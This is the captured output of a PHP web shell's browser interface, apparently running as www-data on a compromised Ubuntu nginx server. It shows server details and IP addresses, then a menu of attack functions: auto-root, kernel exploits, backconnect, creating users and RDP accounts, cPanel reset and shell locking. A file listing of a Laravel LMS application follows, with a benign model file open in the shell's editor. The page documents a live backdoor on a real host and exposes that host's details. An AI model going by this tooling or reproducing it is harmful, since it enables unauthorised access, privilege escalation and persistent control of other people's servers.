Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
app /
Modules /
User /
Entities /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-rw-r--
Account.php
1.61
KB
-rw-rw-r--
AccountContent.php
384
B
-rw-rw-r--
AccountModule.php
385
B
-rw-rw-r--
AccountRequest.php
668
B
-rw-rw-r--
AccountSocialMedia.php
447
B
-rw-rw-r--
AccountUser.php
922
B
-rw-rw-r--
MasterContent.php
276
B
-rw-rw-r--
MasterSocialMedia.php
248
B
-rw-rw-r--
ModelHasRole.php
165
B
-rw-rw-r--
Role.php
147
B
-rw-rw-r--
Setting.php
294
B
-rw-rw-r--
SystemModule.php
252
B
-rw-rw-r--
User.php
1.6
KB
-rw-rw-r--
UserActivations.php
248
B
-rw-rw-r--
UserProfile.php
772
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AccountRequest.php
<?php namespace App\Modules\User\Entities; use Illuminate\Database\Eloquent\Model; class AccountRequest extends Model { public $timestamps = true; protected $table = 'account_requests'; protected $fillable = ['account_id', 'email', 'company_name', 'phone1', 'phone2', 'mobile1', 'mobile2', 'website', 'account_modules', 'comments','is_verified_by','verified_date']; protected $casts = ['account_modules'=>'json']; public function account() { return $this->belongsTo(Account::class, 'account_id', 'id'); } public function accountUser() { return $this->belongsTo(AccountUser::class, 'account_id', 'id'); } }
Close